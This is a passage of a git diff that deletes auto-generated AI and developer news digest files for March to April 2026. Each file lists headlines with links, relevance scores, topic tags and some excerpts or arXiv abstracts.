- ---- - -## [Iran launched unsuccessful attack on UK's Diego Garcia](https://www.bbc.com/news/articles/c5yljdgwppzo) -*Hacker News* | 21/03/2026 | Score: 0.84 -Tags: tool_update - ---- - -## [Show HN: Termcraft – terminal-first 2D sandbox survival in Rust](https://github.com/pagel-s/termcraft) -*Hacker News* | 21/03/2026 | Score: 0.70 -Tags: cli_tool - ---- - -## [Atuin v18.13 – better search, a PTY proxy, and AI for your shell](https://blog.atuin.sh/atuin-v18-13/) -*Hacker News* | 21/03/2026 | Score: 0.70 -Tags: cli_tool - ---- - -## [purl: a curl-esque CLI for making HTTP requests that require payment](https://www.purl.dev/) -*Hacker News* | 21/03/2026 | Score: 0.70 -Tags: cli_tool - ---- - -## [Floci – A free, open-source local AWS emulator](https://github.com/hectorvent/floci) -*Hacker News* | 21/03/2026 | Score: 0.68 -Tags: open_source - ---- - diff --git a/data/digest-2026-03-22.md b/data/digest-2026-03-22.md deleted file mode 100644 index c0ab7c7..0000000 --- a/data/digest-2026-03-22.md +++ /dev/null @@ -1,49 +0,0 @@ -# Stack Scout - AI News Digest -**2026-03-22** | 7 stories | Auto-generated from 88 archived stories - ---- - -## [Elon Musk unveils chip manufacturing plans for SpaceX and Tesla](https://techcrunch.com/2026/03/22/elon-musk-unveils-chip-manufacturing-plans-for-spacex-and-tesla/) -*TechCrunch AI* | 22/03/2026 | Score: 1.00 -Tags: product_launch - -> Elon Musk recently outlined ambitious plans for a chip-building collaboration Tesla and SpaceX — but he has a history of overpromising. 
- ---- - -## [Show HN: A Markdown file that turns your AI agent into an autonomous researcher](https://github.com/krzysztofdudek/ResearcherSkill) -*Hacker News* | 22/03/2026 | Score: 0.92 -Tags: agent_tool - ---- - -## [HopTab–free,open source macOS app switcher and tiler that replaces Cmd+Tab](https://www.royalbhati.com/hoptab) -*Hacker News* | 22/03/2026 | Score: 0.76 -Tags: open_source - ---- - -## [Training Center for Maneuvering on Manned Model Ships](https://www.portrevel.com/) -*Hacker News* | 20/03/2026 | Score: 0.76 -Tags: tool_update - ---- - -## [$ teebot.dev – from terminal to tee in 6 seconds](https://teebot.dev) -*Hacker News* | 22/03/2026 | Score: 0.70 -Tags: cli_tool - ---- - -## [How to Attract AI Bots to Your Open Source Project](https://nesbitt.io/2026/03/21/how-to-attract-ai-bots-to-your-open-source-project.html) -*Hacker News* | 21/03/2026 | Score: 0.68 -Tags: open_source - ---- - -## [Node.js worker threads are problematic, but they work great for us](https://www.inngest.com/blog/node-worker-threads) -*Hacker News* | 18/03/2026 | Score: 0.62 -Tags: cli_tool - ---- - diff --git a/data/digest-2026-03-23.md b/data/digest-2026-03-23.md deleted file mode 100644 index cf1d945..0000000 --- a/data/digest-2026-03-23.md +++ /dev/null @@ -1,25 +0,0 @@ -# Stack Scout - AI News Digest -**2026-03-23** | 3 stories | Auto-generated from 82 archived stories - ---- - -## [The Download: animal welfare gets AGI-pilled, and the White House unveils its AI policy](https://www.technologyreview.com/2026/03/23/1134509/the-download-animal-welfare-agi-pilled-white-house-unveils-ai-policy/) -*MIT Tech Review AI* | 23/03/2026 | Score: 0.88 -Tags: product_launch - -> This is today’s edition of The Download, our weekday newsletter that provides a daily dose of what’s going on in the world of technology. 
The Bay Area’s animal welfare movement wants to recruit AI  In early February, animal welfare advocates and AI researchers arrived in stocking feet at Mox, a scrappy, shoes-free coworking space in… - ---- - -## [Show HN: Agent Kernel – Three Markdown files that make any AI agent stateful](https://github.com/oguzbilgic/agent-kernel) -*Hacker News* | 23/03/2026 | Score: 0.78 -Tags: agent_tool - ---- - -## [The way CTRL-C in Postgres CLI cancels queries is incredibly hack-y](https://neon.com/blog/ctrl-c-in-psql-gives-me-the-heebie-jeebies) -*Hacker News* | 20/03/2026 | Score: 0.70 -Tags: cli_tool - ---- - diff --git a/data/digest-2026-03-24.md b/data/digest-2026-03-24.md deleted file mode 100644 index 5f3535c..0000000 --- a/data/digest-2026-03-24.md +++ /dev/null @@ -1,65 +0,0 @@ -# Stack Scout - AI News Digest -**2026-03-24** | 9 stories | Auto-generated from 101 archived stories - ---- - -## [Google TV’s new Gemini features keep fans updated on sports teams and more](https://techcrunch.com/2026/03/24/google-tv-new-gemini-features-keep-fans-updated-on-sports-teams-deep-dives-visual-answers/) -*TechCrunch AI* | 24/03/2026 | Score: 1.00 -Tags: tool_update - -> Three Gemini-powered features are coming to your Google TV. This includes visual responses, deep dives, and sports briefs. - ---- - -## [OpenAI adds open source tools to help developers build for teen safety](https://techcrunch.com/2026/03/24/openai-adds-open-source-tools-to-help-developers-build-for-teen-safety/) -*TechCrunch AI* | 24/03/2026 | Score: 0.94 -Tags: open_source - -> Rather than working from scratch to figure out how to make AI safer for teens, developers can use these policies to fortify what they build. 
- ---- - -## [Sunsetting the Techempower Framework Benchmarks](https://github.com/TechEmpower/FrameworkBenchmarks/issues/10932) -*Hacker News* | 24/03/2026 | Score: 0.82 -Tags: developer_tool - ---- - -## [Self-propagating malware poisons open source software and wipes Iran-based machines](https://arstechnica.com/security/2026/03/self-propagating-malware-poisons-open-source-software-and-wipes-iran-based-machines/) -*Ars Technica AI* | 24/03/2026 | Score: 0.76 -Tags: open_source - -> Development houses: It's time to check your networks for infections. - ---- - -## [Qite.js – Frontend framework for people who hate React and love HTML](https://qitejs.qount25.dev) -*Hacker News* | 19/03/2026 | Score: 0.76 -Tags: developer_tool - ---- - -## [Nanobrew: The fastest macOS package manager compatible with brew](https://nanobrew.trilok.ai/) -*Hacker News* | 24/03/2026 | Score: 0.70 -Tags: developer_tool - ---- - -## [A retro terminal music player inspired by Winamp](https://github.com/bjarneo/cliamp) -*Hacker News* | 23/03/2026 | Score: 0.70 -Tags: cli_tool - ---- - -## [Show HN: Gridland: make terminal apps that also run in the browser](https://www.gridland.io/) -*Hacker News* | 24/03/2026 | Score: 0.62 -Tags: cli_tool - ---- - -## [Log File Viewer for the Terminal](https://lnav.org/) -*Hacker News* | 24/03/2026 | Score: 0.62 -Tags: cli_tool - ---- - diff --git a/data/digest-2026-03-25.md b/data/digest-2026-03-25.md deleted file mode 100644 index e80cc8d..0000000 --- a/data/digest-2026-03-25.md +++ /dev/null @@ -1,53 +0,0 @@ -# Stack Scout - AI News Digest -**2026-03-25** | 7 stories | Auto-generated from 95 archived stories - ---- - -## [Google launches Lyria 3 Pro music generation model](https://techcrunch.com/2026/03/25/google-launches-lyria-3-pro-music-generation-model/) -*TechCrunch AI* | 25/03/2026 | Score: 1.00 -Tags: product_launch - -> Google is launching Lyria 3 Pro, an upgraded music model that generates longer, more customizable tracks, as it expands AI music 
tools across Gemini, enterprise products, and other services. - ---- - -## [Meta launches new initiative to support entrepreneurship, drive AI adoption](https://techcrunch.com/2026/03/25/meta-launches-new-initiative-to-support-entrepreneurship-drive-ai-adoption/) -*TechCrunch AI* | 25/03/2026 | Score: 1.00 -Tags: product_launch - -> Meta CEO Mark Zuckerberg said in a memo to staff that small businesses have always been a big part of the company's business model, and that while tens of millions of entrepreneurs already use its platforms to grow and connect with customers, the company wants to do more in the space. - ---- - -## [Google unveils TurboQuant, a new AI memory compression algorithm — and yes, the internet is calling it ‘Pied Piper’](https://techcrunch.com/2026/03/25/google-turboquant-ai-memory-compression-silicon-valley-pied-piper/) -*TechCrunch AI* | 25/03/2026 | Score: 0.77 -Tags: product_launch - -> Google’s TurboQuant has the internet joking about Pied Piper from HBO's "Silicon Valley." The compression algorithm promises to shrink AI’s “working memory” by up to 6x, but it’s still just a lab experiment for now. 
- ---- - -## [Building a coding agent in Swift from scratch](https://github.com/ivan-magda/swift-claude-code) -*Hacker News* | 25/03/2026 | Score: 0.70 -Tags: agent_tool - ---- - -## [Show HN: DuckDB community extension for prefiltered HNSW using ACORN-1](https://github.com/cigrainger/duckdb-hnsw-acorn) -*Hacker News* | 25/03/2026 | Score: 0.70 -Tags: developer_tool - ---- - -## [Rendering complex scripts in terminal and OSC 66](https://thottingal.in/blog/2026/03/22/complex-scripts-in-terminal/) -*Hacker News* | 22/03/2026 | Score: 0.70 -Tags: cli_tool - ---- - -## [Open source isn't a tip jar – it's time to charge for access](https://www.theregister.com/2026/03/25/open_source_bill_opinion/) -*Hacker News* | 25/03/2026 | Score: 0.68 -Tags: open_source - ---- - diff --git a/data/digest-2026-03-26.md b/data/digest-2026-03-26.md deleted file mode 100644 index f46f6ad..0000000 --- a/data/digest-2026-03-26.md +++ /dev/null @@ -1,51 +0,0 @@ -# Stack Scout - AI News Digest -**2026-03-26** | 7 stories | Auto-generated from 95 archived stories - ---- - -## [Cohere launches an open source voice model specifically for transcription](https://techcrunch.com/2026/03/26/cohere-launches-an-open-source-voice-model-specifically-for-transcription/) -*TechCrunch AI* | 26/03/2026 | Score: 1.00 -Tags: product_launch, open_source - -> Relatively light at just 2 billion parameters, the model is meant for use with consumer-grade GPUs for those who want to self-host it. It currently supports 14 languages. - ---- - -## [Mistral releases a new open source model for speech generation](https://techcrunch.com/2026/03/26/mistral-releases-a-new-open-source-model-for-speech-generation/) -*TechCrunch AI* | 26/03/2026 | Score: 1.00 -Tags: product_launch, open_source - -> The model, which lets enterprises build voice agents for sales and customer engagement, puts Mistral in direct competition with the likes of ElevenLabs, Deepgram, and OpenAI. 
- ---- - -## [Intel Announces Arc Pro B70 and Arc Pro B65 GPUs](https://www.techpowerup.com/347703/intel-announces-arc-pro-b70-and-arc-pro-b65-gpus-maxes-out-xe2-battlemage-architecture) -*Hacker News* | 26/03/2026 | Score: 0.92 -Tags: product_launch - ---- - -## [Show HN: I put an AI agent on a $7/month VPS with IRC as its transport layer](https://georgelarson.me/writing/2026-03-23-nullclaw-doorman/) -*Hacker News* | 26/03/2026 | Score: 0.78 -Tags: agent_tool - ---- - -## [Show HN: Relay – The open-source Claude Cowork for OpenClaw](https://github.com/SeventeenLabs/relay) -*Hacker News* | 26/03/2026 | Score: 0.71 -Tags: open_source - ---- - -## [Stripe Projects: Provision and manage services from the CLI](https://projects.dev/) -*Hacker News* | 26/03/2026 | Score: 0.70 -Tags: cli_tool - ---- - -## [Shell Tricks That Make Life Easier (and Save Your Sanity)](https://blog.hofstede.it/shell-tricks-that-actually-make-life-easier-and-save-your-sanity/) -*Hacker News* | 26/03/2026 | Score: 0.70 -Tags: cli_tool - ---- - diff --git a/data/digest-2026-03-27.md b/data/digest-2026-03-27.md deleted file mode 100644 index 5d784c5..0000000 --- a/data/digest-2026-03-27.md +++ /dev/null @@ -1,35 +0,0 @@ -# Stack Scout - AI News Digest -**2026-03-27** | 5 stories | Auto-generated from 86 archived stories - ---- - -## [Nashville library launches Memory Lab for digitizing home movies](https://www.axios.com/local/nashville/2026/03/16/nashville-library-digitize-home-movies) -*Hacker News* | 24/03/2026 | Score: 0.84 -Tags: product_launch, developer_tool - ---- - -## [Show HN: Open-Source Animal Crossing–Style UI for Claude Code Agents](https://github.com/outworked/outworked/releases/tag/v0.3.0) -*Hacker News* | 27/03/2026 | Score: 0.77 -Tags: open_source - ---- - -## [Telnyx package compromised on PyPI](https://www.aikido.dev/blog/telnyx-pypi-compromised-teampcp-canisterworm) -*Hacker News* | 27/03/2026 | Score: 0.70 -Tags: developer_tool - ---- - -## [Telnyx package compromised on 
PyPI](https://telnyx.com/resources/telnyx-python-sdk-supply-chain-security-notice-march-2026) -*Hacker News* | 27/03/2026 | Score: 0.70 -Tags: developer_tool - ---- - -## [Show HN: Minimalist library to generate SVG views of scientific data](https://github.com/alefore/mini_svg/) -*Hacker News* | 23/03/2026 | Score: 0.70 -Tags: developer_tool - ---- - diff --git a/data/digest-2026-03-28.md b/data/digest-2026-03-28.md deleted file mode 100644 index 42faafe..0000000 --- a/data/digest-2026-03-28.md +++ /dev/null @@ -1,29 +0,0 @@ -# Stack Scout - AI News Digest -**2026-03-28** | 4 stories | Auto-generated from 67 archived stories - ---- - -## [Arm releases first in-house chip, with Meta as debut customer](https://www.cnbc.com/2026/03/24/arm-launches-its-own-cpu-with-meta-as-first-customer.html) -*Hacker News* | 24/03/2026 | Score: 0.92 -Tags: product_launch - ---- - -## [Improving personal tax filing with Claude CLI and Obsidian](https://www.mrafayaleem.com/blog/improving-personal-tax-filing-with-claude-obsidian) -*Hacker News* | 28/03/2026 | Score: 0.73 -Tags: cli_tool - ---- - -## [Improved Git Diffs with Delta, Fzf and a Little Shell Scripting](https://nickjanetakis.com/blog/awesome-git-diffs-with-delta-fzf-and-a-little-shell-scripting) -*Hacker News* | 24/03/2026 | Score: 0.70 -Tags: cli_tool - ---- - -## [OpenCiv1 – open-source rewrite of Civ1](https://github.com/rajko-horvat/OpenCiv1) -*Hacker News* | 28/03/2026 | Score: 0.68 -Tags: open_source - ---- - diff --git a/data/digest-2026-03-29.md b/data/digest-2026-03-29.md deleted file mode 100644 index 4e410a6..0000000 --- a/data/digest-2026-03-29.md +++ /dev/null @@ -1,23 +0,0 @@ -# Stack Scout - AI News Digest -**2026-03-29** | 3 stories | Auto-generated from 57 archived stories - ---- - -## [Figma's MCP Update Reflects a Larger Industry Shift](https://metedata.substack.com/p/a-small-figma-update-and-a-big-signal) -*Hacker News* | 29/03/2026 | Score: 0.82 -Tags: mcp - ---- - -## [OpenYak – An open-source Cowork 
that runs any model and owns your filesystem](https://github.com/openyak/desktop) -*Hacker News* | 29/03/2026 | Score: 0.82 -Tags: open_source - ---- - -## [Pretext: TypeScript library for multiline text measurement and layout](https://github.com/chenglou/pretext) -*Hacker News* | 28/03/2026 | Score: 0.70 -Tags: developer_tool - ---- - diff --git a/data/digest-2026-03-30.md b/data/digest-2026-03-30.md deleted file mode 100644 index 545fc5d..0000000 --- a/data/digest-2026-03-30.md +++ /dev/null @@ -1,19 +0,0 @@ -# Stack Scout - AI News Digest -**2026-03-30** | 2 stories | Auto-generated from 75 archived stories - ---- - -## [There are more AI health tools than ever—but how well do they work?](https://www.technologyreview.com/2026/03/30/1134795/there-are-more-ai-health-tools-than-ever-but-how-well-do-they-work/) -*MIT Tech Review AI* | 30/03/2026 | Score: 0.91 -Tags: tool_update - -> Earlier this month, Microsoft launched Copilot Health, a new space within its Copilot app where users will be able to connect their medical records and ask specific questions about their health. 
A couple of days earlier, Amazon had announced that Health AI, an LLM-based tool previously restricted to members of its One Medical service, would… - ---- - -## [Build123d: A Python CAD programming library](https://github.com/gumyr/build123d) -*Hacker News* | 29/03/2026 | Score: 0.49 -Tags: developer_tool - ---- - diff --git a/data/digest-2026-03-31.md b/data/digest-2026-03-31.md deleted file mode 100644 index 57b1dec..0000000 --- a/data/digest-2026-03-31.md +++ /dev/null @@ -1,125 +0,0 @@ -# Stack Scout - AI News Digest -**2026-03-31** | 15 stories | Auto-generated from 533 archived stories - ---- - -## [A Regression Framework for Understanding Prompt Component Impact on LLM Performance](https://arxiv.org/abs/2603.26830) -*ArXiv cs.LG (ML)* | 31/03/2026 | Score: 1.00 -Tags: open_source, developer_tool, tool_update - -> arXiv:2603.26830v1 Announce Type: new Abstract: As large language models (LLMs) continue to improve and see further integration into software systems, so does the need to understand the conditions in which they will perform. We contribute a statistical framework for understanding the impact of specific prompt features on LLM performance. The approach extends previous explainable artificial intelligence (XAI) methods specifically to inspect LLMs by fitting regression models relating portions of the prompt to LLM evaluation. We apply our method to compare how two open-source models, Mistral-7B and GPT-OSS-20B, leverage the prompt to perform a simple arithmetic problem. Regression models of individual prompt portions explain 72% and 77% of variation in model performances, respectively. We find misinformation in the form of incorrect example query-answer pairs impedes both models from solving the arithmetic query, though positive examples do not find significant variability in the impact of positive and negative instructions - these prompts have contradictory effects on model performance. 
The framework serves as a tool for decision makers in critical scenarios to gain granular insight into how the prompt influences an LLM to solve a task. - ---- - -## [LangChain Announces Enterprise Agentic AI Platform Built with NVIDIA](https://blog.langchain.com/nvidia-enterprise/) -*LangChain Blog* | 16/03/2026 | Score: 1.00 -Tags: product_launch, open_source, tool_update - -> Comprehensive agent engineering platform combined with NVIDIA AI enables enterprises to build, deploy, and monitor production-grade AI agents at scale Press Release SAN FRANCISCO, March 16, 2026 /PRNewswire/ — LangChain, the agent engineering company behind LangSmith and open-source frameworks that have surpassed 1 billion downloads, today announced a comprehensive integration - ---- - -## [Systematic debugging for AI agents: Introducing the AgentRx framework](https://www.microsoft.com/en-us/research/blog/systematic-debugging-for-ai-agents-introducing-the-agentrx-framework/) -*Microsoft Research Blog* | 12/03/2026 | Score: 1.00 -Tags: api_update, developer_tool, agent_tool - -> As AI agents transition from simple chatbots to autonomous systems capable of managing cloud incidents, navigating complex web interfaces, and executing multi-step API workflows, a new challenge has emerged: transparency. When a human makes a mistake, we can usually trace the logic. But when an AI agent fails, perhaps by hallucinating a tool output or […] The post Systematic debugging for AI agents: Introducing the AgentRx framework appeared first on Microsoft Research . - ---- - -## [Autonomous context compression](https://blog.langchain.com/autonomous-context-compression/) -*LangChain Blog* | 11/03/2026 | Score: 0.86 -Tags: api_update, developer_tool, cli_tool - -> TL;DR: We've added a tool to the Deep Agents SDK (Python) and CLI that allows models to compress their own context windows at opportune times. Motivation Context compression is an action that reduces the information in an agent’s working memory. 
Older messages are replaced by - ---- - -## [Squish and Release: Exposing Hidden Hallucinations by Making Them Surface as Safety Signals](https://arxiv.org/abs/2603.26829) -*ArXiv cs.LG (ML)* | 31/03/2026 | Score: 1.00 -Tags: product_launch, developer_tool - -> arXiv:2603.26829v1 Announce Type: new Abstract: Language models detect false premises when asked directly but absorb them under conversational pressure, producing authoritative professional output built on errors they already identified. This failure - order-gap hallucination - is invisible to output inspection because the error migrates into the activation space of the safety circuit, suppressed but not erased. We introduce Squish and Release (S&R), an activation-patching architecture with two components: a fixed detector body (layers 24-31, the localized safety evaluation circuit) and a swappable detector core (an activation vector controlling perception direction). A safety core shifts the model from compliance toward detection; an absorb core reverses it. We evaluate on OLMo-2 7B using the Order-Gap Benchmark - 500 chains across 500 domains, all manually graded. Key findings: cascade collapse is near-total (99.8% compliance at O5); the detector body is binary and localized (layers 24-31 shift 93.6%, layers 0-23 contribute zero, p<10^-189); a synthetically engineered core releases 76.6% of collapsed chains; detection is the more stable attractor (83% restore vs 58% suppress); and epistemic specificity is confirmed (false-premise core releases 45.4%, true-premise core releases 0.0%). The contribution is the framework - body/core architecture, benchmark, and core engineering methodology - which is model-agnostic by design. 
- ---- - -## [A Step Toward Federated Pretraining of Multimodal Large Language Models](https://arxiv.org/abs/2603.26786) -*ArXiv cs.LG (ML)* | 31/03/2026 | Score: 1.00 -Tags: product_launch, developer_tool - -> arXiv:2603.26786v1 Announce Type: new Abstract: The rapid evolution of Multimodal Large Language Models (MLLMs) is bottlenecked by the saturation of high-quality public data, while vast amounts of diverse multimodal data remain inaccessible in privacy-sensitive silos. Federated Learning (FL) offers a promising solution to unlock these distributed resources, but existing research focuses predominantly on fine-tuning, leaving the foundational pre-training phase largely unexplored. In this paper, we formally introduce the Federated MLLM Alignment (Fed-MA) task, a lightweight pre-training paradigm that freezes the vision encoder and LLM while collaboratively training the cross-modal projector. We identify two critical challenges in this setting: (i) parameter interference in aggregating local projectors; and (ii) gradient oscillations in one-pass collaborative SGD. To address these challenges, we propose Fed-CMP, a pioneering framework for federated MLLM pre-training. Fed-CMP employs Canonical Reliability-Aware Aggregation, which constructs a canonical space to decompose client projectors into a shared alignment basis and client-specific coefficients, then performs reliability-weighted fusion to suppress parameter interference. Furthermore, Fed-CMP introduces Orthogonality-Preserved Momentum, which applies momentum to the shared alignment basis via orthogonal projection, accumulating historical optimization directions while preserving geometric structure. We construct four federated pre-training scenarios based on public datasets, and extensive experiments validate that Fed-CMP significantly outperforms existing baselines. 
- ---- - -## [TED: Training-Free Experience Distillation for Multimodal Reasoning](https://arxiv.org/abs/2603.26778) -*ArXiv cs.LG (ML)* | 31/03/2026 | Score: 1.00 -Tags: developer_tool, tool_update - -> arXiv:2603.26778v1 Announce Type: new Abstract: Knowledge distillation is typically realized by transferring a teacher model's knowledge into a student's parameters through supervised or reinforcement-based optimization. While effective, such approaches require repeated parameter updates and large-scale training data, limiting their applicability in resource-constrained environments. In this work, we propose TED, a training-free, context-based distillation framework that shifts the update target of distillation from model parameters to an in-context experience injected into the student's prompt. For each input, the student generates multiple reasoning trajectories, while a teacher independently produces its own solution. The teacher then compares the student trajectories with its reasoning and the ground-truth answer, extracting generalized experiences that capture effective reasoning patterns. These experiences are continuously refined and updated over time. A key challenge of context-based distillation is unbounded experience growth and noise accumulation. TED addresses this with an experience compression mechanism that tracks usage statistics and selectively merges, rewrites, or removes low-utility experiences. Experiments on multimodal reasoning benchmarks MathVision and VisualPuzzles show that TED consistently improves performance. On MathVision, TED raises the performance of Qwen3-VL-8B from 0.627 to 0.702, and on VisualPuzzles from 0.517 to 0.561 with just 100 training samples. Under this low-data, no-update setting, TED achieves performance competitive with fully trained parameter-based distillation while reducing training cost by over 5x, demonstrating that meaningful knowledge transfer can be achieved through contextual experience. 
- ---- - -## [EpochX: Building the Infrastructure for an Emergent Agent Civilization](https://arxiv.org/abs/2603.27304) -*ArXiv cs.AI* | 31/03/2026 | Score: 1.00 -Tags: api_update, product_launch - -> arXiv:2603.27304v1 Announce Type: new Abstract: General-purpose technologies reshape economies less by improving individual tools than by enabling new ways to organize production and coordination. We believe AI agents are approaching a similar inflection point: as foundation models make broad task execution and tool use increasingly accessible, the binding constraint shifts from raw capability to how work is delegated, verified, and rewarded at scale. We introduce EpochX, a credits-native marketplace infrastructure for human-agent production networks. EpochX treats humans and agents as peer participants who can post tasks or claim them. Claimed tasks can be decomposed into subtasks and executed through an explicit delivery workflow with verification and acceptance. Crucially, EpochX is designed so that each completed transaction can produce reusable ecosystem assets, including skills, workflows, execution traces, and distilled experience. These assets are stored with explicit dependency structure, enabling retrieval, composition, and cumulative improvement over time. EpochX also introduces a native credit mechanism to make participation economically viable under real compute costs. Credits lock task bounties, budget delegation, settle rewards upon acceptance, and compensate creators when verified assets are reused. By formalizing the end-to-end transaction model together with its asset and incentive layers, EpochX reframes agentic AI as an organizational design problem: building infrastructures where verifiable work leaves persistent, reusable artifacts, and where value flows support durable human-agent collaboration. 
- ---- - -## [Bitboard version of Tetris AI](https://arxiv.org/abs/2603.26765) -*ArXiv cs.AI* | 31/03/2026 | Score: 1.00 -Tags: developer_tool, tool_update - -> arXiv:2603.26765v1 Announce Type: new Abstract: The efficiency of game engines and policy optimization algorithms is crucial for training reinforcement learning (RL) agents in complex sequential decision-making tasks, such as Tetris. Existing Tetris implementations suffer from low simulation speeds, suboptimal state evaluation, and inefficient training paradigms, limiting their utility for large-scale RL research. To address these limitations, this paper proposes a high-performance Tetris AI framework based on bitboard optimization and improved RL algorithms. First, we redesign the Tetris game board and tetrominoes using bitboard representations, leveraging bitwise operations to accelerate core processes (e.g., collision detection, line clearing, and Dellacherie-Thiery Features extraction) and achieve a 53-fold speedup compared to OpenAI Gym-Tetris. Second, we introduce an afterstate-evaluating actor network that simplifies state value estimation by leveraging Tetris afterstate property, outperforming traditional action-value networks with fewer parameters. Third, we propose a buffer-optimized Proximal Policy Optimization (PPO) algorithm that balances sampling and update efficiency, achieving an average score of 3,829 on 10x10 grids within 3 minutes. Additionally, we develop a Python-Java interface compliant with the OpenAI Gym standard, enabling seamless integration with modern RL frameworks. Experimental results demonstrate that our framework enhances Tetris's utility as an RL benchmark by bridging low-level bitboard optimizations with high-level AI strategies, providing a sample-efficient and computationally lightweight solution for scalable sequential decision-making research. 
- ---- - -## [Together AI Brings NVIDIA Nemotron 3 to Developers on Day 0](https://www.together.ai/blog/nvidia-nemotron-3-super) -*Together AI Blog* | 11/03/2026 | Score: 1.00 -Tags: api_update, product_launch - -> NVIDIA Nemotron 3 Super is now available on Together AI Dedicated Inference, delivering efficient multi-agent reasoning, a 1M-token context window, and production-grade deployment on managed infrastructure. - ---- - -## [Together Evaluations now supports comparing top commercial APIs vs. open source models](https://www.together.ai/blog/together-evaluations-v2) -*Together AI Blog* | 02/02/2026 | Score: 1.00 -Tags: open_source, tool_update - -> Together Evaluations now supports OpenAI, Anthropic, and Google models for cross-provider benchmarking. Compare open-source, fine-tuned, and proprietary models side-by-side to make data-driven decisions on quality, cost, and performance—all in one platform. - ---- - -## [Introducing deploy cli](https://blog.langchain.com/introducing-deploy-cli/) -*LangChain Blog* | 16/03/2026 | Score: 0.69 -Tags: developer_tool, cli_tool - -> We’re excited to introduce the deploy cli, a new set of commands within the langgraph-cli package that makes it simple to deploy and manage agents directly from the command line. The first command in this new set, langgraph deploy , lets you deploy an agent to LangSmith Deployment in - ---- - -## [Introducing LangSmith Sandboxes: Secure Code Execution for Agents](https://blog.langchain.com/introducing-langsmith-sandboxes-secure-code-execution-for-agents/) -*LangChain Blog* | 17/03/2026 | Score: 0.62 -Tags: api_update, developer_tool - -> Spin up a sandbox in a single line of code with the LangSmith SDK. Now in Private Preview. 
- ---- - -## [Open SWE: An Open-Source Framework for Internal Coding Agents](https://blog.langchain.com/open-swe-an-open-source-framework-for-internal-coding-agents/) -*LangChain Blog* | 17/03/2026 | Score: 0.62 -Tags: open_source, developer_tool - -> Built on Deep Agents and LangGraph, Open SWE provides the core architectural components for internal coding agents. - ---- - -## [Exclusive: Runway launches $10M fund, Builders program to support early-stage AI startups](https://techcrunch.com/2026/03/31/exclusive-runway-launches-10m-fund-builders-program-to-support-early-stage-ai-startups/) -*TechCrunch AI* | 31/03/2026 | Score: 1.00 -Tags: product_launch - -> Runway is launching a $10 million fund and startup program to back companies building with its AI video models, as it pushes toward interactive, real-time “video intelligence” applications. - ---- - diff --git a/data/digest-2026-04-01.md b/data/digest-2026-04-01.md deleted file mode 100644 index d23eb8c..0000000 --- a/data/digest-2026-04-01.md +++ /dev/null @@ -1,95 +0,0 @@ -# Stack Scout - AI News Digest -**2026-04-01** | 15 stories | Auto-generated from 894 archived stories - ---- - -## [MiniMax Releases M2.1: An Enhanced M2 Version with Features like Multi-Coding Language Support, API Integration, and Improved Tools for Structured Coding](https://www.marktechpost.com/2025/12/25/minimax-releases-m2-1-an-enhanced-m2-version-with-features-like-multi-coding-language-support-api-integration-and-improved-tools-for-structured-coding/) -*MarkTechPost* | Score: 1.00 -Tags: api_update, product_launch, tool_update - ---- - -## [Agent-Infra Releases AIO Sandbox: An All-in-One Runtime for AI Agents with Browser, Shell, Shared Filesystem, and MCP](https://www.marktechpost.com/2026/03/29/agent-infra-releases-aio-sandbox-an-all-in-one-runtime-for-ai-agents-with-browser-shell-shared-filesystem-and-mcp/) -*MarkTechPost* | Score: 1.00 -Tags: mcp, product_launch, cli_tool - ---- - -## [UT Austin and ServiceNow Research Team 
Releases AU-Harness: An Open-Source Toolkit for Holistic Evaluation of Audio LLMs](https://www.marktechpost.com/2025/09/14/ut-austin-and-servicenow-research-team-releases-au-harness-an-open-source-toolkit-for-holistic-evaluation-of-audio-llms/) -*MarkTechPost* | Score: 1.00 -Tags: product_launch, open_source - ---- - -## [Google AI Releases Veo 3.1 Lite: Giving Developers Low Cost High Speed Video Generation via The Gemini API](https://www.marktechpost.com/2026/03/31/google-ai-releases-veo-3-1-lite-giving-developers-low-cost-high-speed-video-generation-via-the-gemini-api/) -*MarkTechPost* | Score: 1.00 -Tags: api_update, product_launch - ---- - -## [Improve coding agents’ performance with Gemini API Docs MCP and Agent Skills.](https://blog.google/innovation-and-ai/technology/developers-tools/gemini-api-docsmcp-agent-skills/) -*Google AI Blog* | Score: 1.00 -Tags: api_update, mcp - ---- - -## [AnnouncementsFeb 5, 2026Introducing Claude Opus 4.6We’re upgrading our smartest model. Across agentic coding, computer use, tool use, search, and finance, Opus 4.6 is an industry-leading model, often by wide margin.](https://www.anthropic.com/news/claude-opus-4-6) -*Anthropic News* | Score: 1.00 -Tags: api_update, agent_tool - ---- - -## [Show HN: CLI to order groceries via reverse-engineered REWE API (Haskell)](https://github.com/yannick-cw/korb) -*Hacker News* | 30/03/2026 | Score: 0.74 -Tags: api_update, cli_tool - ---- - -## [Stability AI Announces Investment from WPP and New Partnership to Shape the Future of Media and Entertainment Production](https://stability.ai/news-updates/stability-ai-announces-investment-from-wpp-and-new-partnership-to-shape-the-future-of-media-and-entertainment-production) -*Stability AI Blog* | Score: 1.00 -Tags: product_launch - ---- - -## [NVIDIA Releases New AI Models and Developer Tools to Advance Autonomous Vehicle Ecosystem](https://blogs.nvidia.com/blog/autonomous-vehicle-ecosystem-ai-models-developer-tools/) -*NVIDIA AI Blog* | Score: 
1.00 -Tags: product_launch - ---- - -## [An Implementation of IWE’s Context Bridge as an AI-Powered Knowledge Graph with Agentic RAG, OpenAI Function Calling, and Graph Traversal](https://www.marktechpost.com/2026/03/27/an-implementation-of-iwes-context-bridge-as-an-ai-powered-knowledge-graph-with-agentic-rag-openai-function-calling-and-graph-traversal/) -*MarkTechPost* | Score: 1.00 -Tags: api_update - ---- - -## [How to Design a Fully Functional Enterprise AI Assistant with Retrieval Augmentation and Policy Guardrails Using Open Source AI Models](https://www.marktechpost.com/2025/10/22/how-to-design-a-fully-functional-enterprise-ai-assistant-with-retrieval-augmentation-and-policy-guardrails-using-open-source-ai-models/) -*MarkTechPost* | Score: 1.00 -Tags: open_source - ---- - -## [Salesforce AI Research Releases VoiceAgentRAG: A Dual-Agent Memory Router that Cuts Voice RAG Retrieval Latency by 316x](https://www.marktechpost.com/2026/03/30/salesforce-ai-research-releases-voiceagentrag-a-dual-agent-memory-router-that-cuts-voice-rag-retrieval-latency-by-316x/) -*MarkTechPost* | Score: 1.00 -Tags: product_launch - ---- - -## [Hugging Face Releases TRL v1.0: A Unified Post-Training Stack for SFT, Reward Modeling, DPO, and GRPO Workflows](https://www.marktechpost.com/2026/04/01/hugging-face-releases-trl-v1-0-a-unified-post-training-stack-for-sft-reward-modeling-dpo-and-grpo-workflows/) -*MarkTechPost* | Score: 1.00 -Tags: product_launch - ---- - -## [Salesforce announces an AI-heavy makeover for 